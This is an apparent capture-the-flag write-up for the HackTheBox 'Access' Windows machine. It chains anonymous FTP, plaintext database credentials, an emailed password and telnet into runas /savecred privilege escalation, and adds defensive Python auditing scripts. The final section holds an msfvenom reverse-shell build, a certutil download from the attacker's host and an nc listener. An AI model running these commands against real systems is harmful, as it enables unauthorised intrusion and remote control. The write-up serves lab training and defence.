HackTheBox - Access

Updated 29-03-2026

A Windows machine where anonymous FTP access begins a credential chain — through a database file, an email archive, and a telnet session — ending with stored administrator credentials ready to leverage.

Recon

Nmap

$ target=10.129.10.234; ports=$(nmap -p- --min-rate=1000 -T4 "$target" 2>/dev/null | awk -F/ '/^[0-9]+\/tcp/ && /open/ {print $1}' | paste -sd, -); nmap -p"$ports" -sC -sV "$target"
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-02-16 10:46 EST
Nmap scan report for 10.129.10.234
Host is up (0.28s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
| ftp-syst:
|_ SYST: Windows_NT
23/tcp open telnet Microsoft Windows XP telnetd
| telnet-ntlm-info:
| Target_Name: ACCESS
| NetBIOS_Domain_Name: ACCESS
| NetBIOS_Computer_Name: ACCESS
| DNS_Domain_Name: ACCESS
| DNS_Computer_Name: ACCESS
|_ Product_Version: 6.1.7600
80/tcp open http Microsoft IIS httpd 7.5
|_http-title: MegaCorp
|_http-server-header: Microsoft-IIS/7.5
| http-methods:
|_ Potentially risky methods: TRACE
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.84 seconds

Foothold

The web server didn’t expose anything useful.

FTP enumeration

Anonymous FTP login is allowed. The FTP root contains two directories: Backups and Engineer.

┌──(kali㉿kali)-[~]
└─$ ftp 10.129.10.234
Connected to 10.129.10.234.
220 Microsoft FTP Service
Name (10.129.10.234:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
425 Cannot open data connection.
200 PORT command successful.
150 Opening ASCII mode data connection.
08-23-18 08:16PM <DIR> Backups
08-24-18 09:00PM <DIR> Engineer
226 Transfer complete.
ftp> exit
221 Goodbye.

Two files were discovered on the FTP server:

  • Engineer/Access Control.zip
  • Backups/backup.mdb

Downloading backup.mdb was unreliable due to network interruption, but Access Control.zip downloaded successfully.

ftp> cd Engineer
ftp> ls
08-24-18 12:16AM 10870 Access Control.zip
ftp> get Access\ Control.zip

To reliably retrieve the database, lftp was used with passive mode disabled and retries enabled. Active mode was chosen because the plain ftp session above shows the PASV attempt failing with 425 while the PORT fallback succeeded. Note that lftp rejects ftp:use-epsv as an unknown variable (the error is visible in the output below); the setting is unnecessary once passive mode is off, and the transfer completes regardless.

$ rm -f backup.mdb
lftp -u anonymous,anonymous ftp://10.129.10.234 -e "
set ftp:passive-mode false;
set ftp:use-epsv false;
set net:timeout 20;
set net:max-retries 20;
cd /Backups;
get -c backup.mdb;
bye"

ftp:use-epsv: no such variable. Use `set -a' to look at all variables.
cd ok, cwd=/Backups
5652480 bytes transferred in 21 seconds (262.0 KiB/s)

Extract credentials from backup.mdb

backup.mdb is a Microsoft Access database. Using mdbtools, the auth_user table was listed and exported; it holds credentials for three users, with every password stored in plaintext.

$ mdb-tables -1 backup.mdb                    

<-SNIP->
auth_group_permissions
auth_message
auth_permission
auth_user
auth_user_groups
auth_user_user_permissions
<-SNIP->

$ mdb-export backup.mdb auth_user
id,username,password,Status,last_login,RoleID,Remark
25,"admin","admin",1,"08/23/18 21:11:47",26,
27,"engineer","access4u@security",1,"08/23/18 21:13:36",26,
28,"backup_admin","admin",1,"08/23/18 21:14:02",26,
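As an added example (not code from the page or from the application that produced backup.mdb), the exported auth_user table can be audited mechanically for the weaknesses visible above: plaintext storage, a password equal to the username, and one password shared across accounts. It assumes the CSV layout mdb-export printed, and the list of hash formats it recognises is a constructed, non-exhaustive set chosen to cover what a legacy web application would plausibly use.

```python
import csv
import io
import re
from collections import Counter

# Constructed sample: the auth_user rows exactly as mdb-export printed them above.
AUTH_USER_CSV = """id,username,password,Status,last_login,RoleID,Remark
25,"admin","admin",1,"08/23/18 21:11:47",26,
27,"engineer","access4u@security",1,"08/23/18 21:13:36",26,
28,"backup_admin","admin",1,"08/23/18 21:14:02",26,
"""

# Shapes a stored password takes once it has actually been hashed; any value
# matching none of them is reported as plaintext. Assumption: this list covers
# the schemes a legacy web application would use; extend it for other apps.
HASH_FORMATS = [
    re.compile(r"^\$2[aby]\$\d{2}\$[./A-Za-z0-9]{53}$"),                  # bcrypt
    re.compile(r"^pbkdf2_sha256\$\d+\$"),                                  # Django PBKDF2
    re.compile(r"^\$(?:1|5|6)\$"),                                         # crypt(3) MD5/SHA-256/SHA-512
    re.compile(r"^(?:[0-9a-fA-F]{32}|[0-9a-fA-F]{40}|[0-9a-fA-F]{64})$"),  # bare MD5/SHA-1/SHA-256 hex
]

def looks_hashed(value):
    return any(p.match(value) for p in HASH_FORMATS)

def audit_auth_user(csv_text):
    """Return (username, finding) pairs for an mdb-export of an auth_user-style table."""
    rows = list(csv.DictReader(io.StringIO(csv_text)))
    shared = Counter(r["password"] for r in rows)   # how many accounts use each password
    findings = []
    for r in rows:
        user, pw = r["username"], r["password"]
        if not looks_hashed(pw):
            findings.append((user, "password stored in plaintext"))
        if pw.lower() == user.lower():
            findings.append((user, "password equals username"))
        if shared[pw] > 1:
            findings.append((user, "password shared with another account"))
    return findings

if __name__ == "__main__":
    for user, finding in audit_auth_user(AUTH_USER_CSV):
        print(f"{user:<14} {finding}")
```

Run against the rows above it reports six findings: all three accounts are plaintext, admin uses its own name as a password, and admin and backup_admin share one.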

Decrypt and extract Access Control.zip

Access Control.zip is password protected. The engineer account's password (access4u@security) opened it, yielding a PST file.

$ 7z x -p'access4u@security' 'Access Control.zip'

7-Zip 24.07 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-06-19
64-bit locale=C.UTF-8 Threads:128 OPEN_MAX:1024

Scanning the drive for archives:
1 file, 10870 bytes (11 KiB)

Extracting archive: Access Control.zip
--
Path = Access Control.zip
Type = zip
Physical Size = 10870

Everything is Ok

Size: 271360

$ ls
'Access Control.pst'

The archive contained Access Control.pst (an Outlook Personal Storage Table).

Read mailbox contents from the PST

The PST was converted into an MBOX file:

$ mkdir -p pst_out
$ readpst -o pst_out "Access Control.pst"
$ cd pst_out
$ ls
'Access Control.mbox'

The MBOX file was reviewed:

$ less Access\ Control.mbox

The mailbox contained the following text:

The password for the “security” account has been changed to 4Cc3ssC0ntr0ller.  Please ensure this is passed on to your engineers.
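The mailbox is the weak link here: a password was sent in clear text over email. As an added example (not part of the original write-up), the same readpst output can be scanned automatically for password-change notices of this shape, which is the check a mail-DLP rule or an incident responder triaging an exported mailbox would run. The mbox below is constructed: the body repeats the sentence found above, while the sender, recipient and subject are placeholders. The pattern is an assumption about how such notices are phrased and will need extending for other wordings; the secret itself is reported masked so the scanner's own output does not become a second disclosure.

```python
import mailbox
import os
import re
import tempfile

# Constructed mbox: one message whose body repeats the notice found in
# "Access Control.mbox"; the addresses and subject are placeholders.
SAMPLE_MBOX = """From helpdesk@example.com Thu Aug 23 23:44:07 2018
From: helpdesk@example.com
To: engineering@example.com
Subject: Access control system account update
Date: Thu, 23 Aug 2018 23:44:07 +0000

Hi all,

The password for the "security" account has been changed to 4Cc3ssC0ntr0ller.  Please ensure this is passed on to your engineers.

Regards,
Helpdesk
"""

# Assumption: notices read "password for the <account> account has been changed to <secret>".
PASSWORD_NOTICE = re.compile(
    r"""password\s+for\s+(?:the\s+)?["'“]?(?P<account>[\w.\-]+)["'”]?\s+account
        \s+(?:has\s+been|was|is)\s+(?:changed|set|reset)\s+to\s+(?P<secret>\S+?)[.,;]?(?:\s|$)""",
    re.IGNORECASE | re.VERBOSE,
)

def message_text(msg):
    """Concatenate the decoded text/plain parts of a message (attachments are ignored)."""
    parts = []
    for part in msg.walk():
        if part.get_content_type() == "text/plain":
            payload = part.get_payload(decode=True)
            if payload:
                parts.append(payload.decode(part.get_content_charset() or "utf-8", "replace"))
    return "\n".join(parts)

def find_credential_disclosures(mbox_path):
    """Scan every message in an mbox file; report account names and masked secrets only."""
    findings = []
    for msg in mailbox.mbox(mbox_path).values():
        for m in PASSWORD_NOTICE.finditer(message_text(msg)):
            secret = m.group("secret")
            findings.append({
                "subject": msg["subject"],
                "account": m.group("account"),
                "secret_masked": secret[:2] + "*" * (len(secret) - 2),
                "secret_length": len(secret),
            })
    return findings

def scan_mbox_text(mbox_text):
    """mailbox.mbox wants a path, so write the constructed text to a temp file and scan it."""
    fd, path = tempfile.mkstemp(suffix=".mbox")
    try:
        with os.fdopen(fd, "w") as fh:
            fh.write(mbox_text)
        return find_credential_disclosures(path)
    finally:
        os.unlink(path)

if __name__ == "__main__":
    for f in scan_mbox_text(SAMPLE_MBOX):
        print(f"[{f['subject']}] account={f['account']} secret={f['secret_masked']}")
```

Pointing find_credential_disclosures at the real Access Control.mbox produced by readpst gives the same kind of result; the masked output tells a responder which account to rotate without copying the password into a ticket.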

Telnet access

Since telnet is open on port 23, the credentials security:4Cc3ssC0ntr0ller were used to log in.

$ telnet 10.129.10.234 23
Trying 10.129.10.234...
Connected to 10.129.10.234.
Escape character is '^]'.
Welcome to Microsoft Telnet Service

login: security
password:

*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>

Login was successful.

Privilege Escalation

Find stored administrator credentials

While enumerating the filesystem as security, an interesting shortcut was found on the Public desktop:

C:\Users\security\Desktop>for /d %G in (C:\Users\*) do @echo ==== %G ==== & @dir /s /b "%G" 2>nul

<-SNIP->
C:\Users\Public\Desktop\ZKAccess3.5 Security System.lnk
<-SNIP->

The .lnk file content was viewed directly:

C:\Users\Public\Desktop>type "ZKAccess3.5 Security System.lnk"
L�F�@ ��7���7���#�P/P�O� �:i�+00�/C:\R1M�:Windows���:�▒M�:*wWindowsV1MV�System32���:�▒MV�*�System32▒X2P�:�
runas.exe���:1��:1�*Yrunas.exe▒L-K��E�C:\Windows\System32\runas.exe#..\..\..\Windows\System32\runas.exeC:\ZKTeco\ZKAccess3.5G/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"'C:\ZKTeco\ZKAccess3.5\img\AccessNET.ico�%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico�%�
�wN�▒�]N�D.��Q���`�Xaccess�_���8{E�3
O�j)�H���
)ΰ[�_���8{E�3
O�j)�H���
)ΰ[� ��1SPS��XF�L8C���&�m�e*S-1-5-21-953262931-566350628-63446256-500

From this output, the key information extracted was:

C:\Windows\System32\runas.exe /user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"
C:\ZKTeco\ZKAccess3.5\img\AccessNET.ico

This indicates runas.exe is used with /savecred to run Access.exe as ACCESS\Administrator.

Checking stored credentials with cmdkey confirmed that an interactive credential for the administrator account is cached:

C:\Users>runas /list

C:\Users>cmdkey /list

Currently stored credentials:

Target: Domain:interactive=ACCESS\Administrator
Type: Domain Password
User: ACCESS\Administrator

Because cmdkey shows a stored Domain:interactive credential for ACCESS\Administrator, runas with /savecred will reuse it and execute commands as ACCESS\Administrator without prompting for a password.
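Reading the shortcut with type, as above, works but is fragile; the strings are laid out in a documented format (MS-SHLLINK) and can be parsed, which is how a forensic triage of a host would recover them. The following is an added example, not code from the write-up or from ZKTeco: it parses the ShellLinkHeader and the StringData section of a .lnk, parses cmdkey /list output, and correlates the two to flag exactly the condition found on this machine, a runas /savecred shortcut whose target account has a stored interactive credential. Since no real shortcut is embedded in the page, build_lnk constructs a minimal sample that carries the strings recovered above; real shortcuts, like the one dumped, also contain a LinkTargetIDList, LinkInfo and ExtraData, which the parser skips or ignores. The cp1252 code page for non-Unicode shortcuts is an assumption.

```python
import re
import struct

# MS-SHLLINK layout: a 0x4C-byte ShellLinkHeader whose LinkFlags (offset 0x14)
# say which optional structures follow, then StringData strings in a fixed order.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
STRING_DATA = (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
               ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
               ("icon_location", HAS_ICON_LOCATION))

def build_lnk(**strings):
    """Build a minimal Unicode .lnk (header + StringData only); used to construct the sample."""
    flags, body = IS_UNICODE, b""
    for name, bit in STRING_DATA:
        if name in strings:
            flags |= bit
            body += struct.pack("<H", len(strings[name])) + strings[name].encode("utf-16-le")
    # HeaderSize, CLSID, LinkFlags, FileAttributes, three FILETIMEs, FileSize,
    # IconIndex, ShowCommand (SW_SHOWNORMAL), HotKey, Reserved1/2/3
    header = struct.pack("<I16sIIQQQIiIHHII", 0x4C, LNK_CLSID, flags, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    return header + body

def parse_lnk(data, ansi_codepage="cp1252"):
    """Return the StringData fields of a Shell Link as a dict; ExtraData after them is ignored."""
    header_size, = struct.unpack_from("<I", data, 0)
    if header_size != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags, = struct.unpack_from("<I", data, 0x14)
    off = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:        # IDListSize (u16) followed by that many bytes
        size, = struct.unpack_from("<H", data, off)
        off += 2 + size
    if flags & HAS_LINK_INFO:                  # LinkInfoSize (u32) counts itself
        size, = struct.unpack_from("<I", data, off)
        off += size
    fields = {}
    for name, bit in STRING_DATA:
        if not flags & bit:
            continue
        count, = struct.unpack_from("<H", data, off)   # CountCharacters, no terminator
        off += 2
        if flags & IS_UNICODE:
            fields[name] = data[off:off + 2 * count].decode("utf-16-le")
            off += 2 * count
        else:                                  # assumption: ANSI strings are cp1252
            fields[name] = data[off:off + count].decode(ansi_codepage, "replace")
            off += count
    return fields

def parse_cmdkey_list(text):
    """Turn `cmdkey /list` output into a list of {target, type, user} dicts."""
    entries, cur = [], {}
    for line in text.splitlines():
        m = re.match(r"\s*(Target|Type|User):\s*(.+?)\s*$", line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2)
        if key == "target" and cur:            # a new Target line starts the next entry
            entries.append(cur)
            cur = {}
        cur[key] = value
    if cur:
        entries.append(cur)
    return entries

def savecred_findings(lnk_fields, cmdkey_entries):
    """Flag a runas /savecred shortcut, and whether a stored credential makes it password-free."""
    findings = []
    args = lnk_fields.get("arguments", "")
    is_runas = "runas.exe" in lnk_fields.get("relative_path", "").lower()
    m = re.search(r"/user:(\S+)", args, re.IGNORECASE)
    if is_runas and "/savecred" in args.lower() and m:
        account = m.group(1)
        findings.append(f"shortcut runs runas /savecred as {account}")
        for e in cmdkey_entries:
            if (e.get("target", "").lower().startswith("domain:interactive=")
                    and e.get("user", "").lower() == account.lower()):
                findings.append(f"stored interactive credential for {account}: runas will not prompt")
    return findings

# Constructed sample: the strings recovered from the real shortcut above, and the cmdkey output above.
SAMPLE_LNK = build_lnk(
    relative_path=r"..\..\..\Windows\System32\runas.exe",
    working_dir=r"C:\ZKTeco\ZKAccess3.5",
    arguments=r'/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"',
    icon_location=r"C:\ZKTeco\ZKAccess3.5\img\AccessNET.ico",
)
SAMPLE_CMDKEY = """Currently stored credentials:

    Target: Domain:interactive=ACCESS\\Administrator
    Type: Domain Password
    User: ACCESS\\Administrator
"""

if __name__ == "__main__":
    fields = parse_lnk(SAMPLE_LNK)
    for line in savecred_findings(fields, parse_cmdkey_list(SAMPLE_CMDKEY)):
        print(line)
```

On a real host the same functions take the bytes of the .lnk file and the text of cmdkey /list; the second finding only appears when the account named in /user: also has a Domain:interactive entry, which is the pairing that turns a convenience shortcut into a privilege escalation path.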

Verify admin execution with runas

A quick validation wrote whoami output into C:\Temp\whoami_admin.txt:

C:\Users>runas /user:ACCESS\Administrator /savecred "cmd /c whoami > C:\Temp\whoami_admin.txt"

C:\Users>dir C:\Temp
Volume in drive C has no label.
Volume Serial Number is 8164-DB5F

Directory of C:\Temp

02/16/2026 06:07 PM <DIR> .
02/16/2026 06:07 PM <DIR> ..
08/21/2018 10:25 PM <DIR> logs
08/21/2018 10:25 PM <DIR> scripts
08/21/2018 10:25 PM <DIR> sqlsource
02/16/2026 06:07 PM 22 whoami_admin.txt
1 File(s) 22 bytes
5 Dir(s) 3,346,440,192 bytes free

C:\Users>type C:\Temp\whoami_admin.txt
access\administrator

Gain a reverse shell as Administrator

A Windows x64 reverse shell payload was generated with msfvenom:

$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.103 LPORT=1234 -f exe > shell.exe

The payload was hosted via a Python HTTP server:

$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

On the target, certutil fetched the payload into C:\Temp\shell.exe:

C:\Users>certutil -urlcache -split -f http://10.10.16.103/shell.exe C:\Temp\shell.exe
**** Online ****
0000 ...
1e00
CertUtil: -URLCache command completed successfully.

A listener was started:

$ nc -lnvp 1234

The payload was executed as ACCESS\Administrator using the stored credentials:

C:\Users>runas /user:ACCESS\Administrator /savecred "C:\Temp\shell.exe"

This produced a shell on the listener. The session landed in C:\Windows\system32>:

$ nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.16.103] from (UNKNOWN) [10.129.10.234] 49167
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>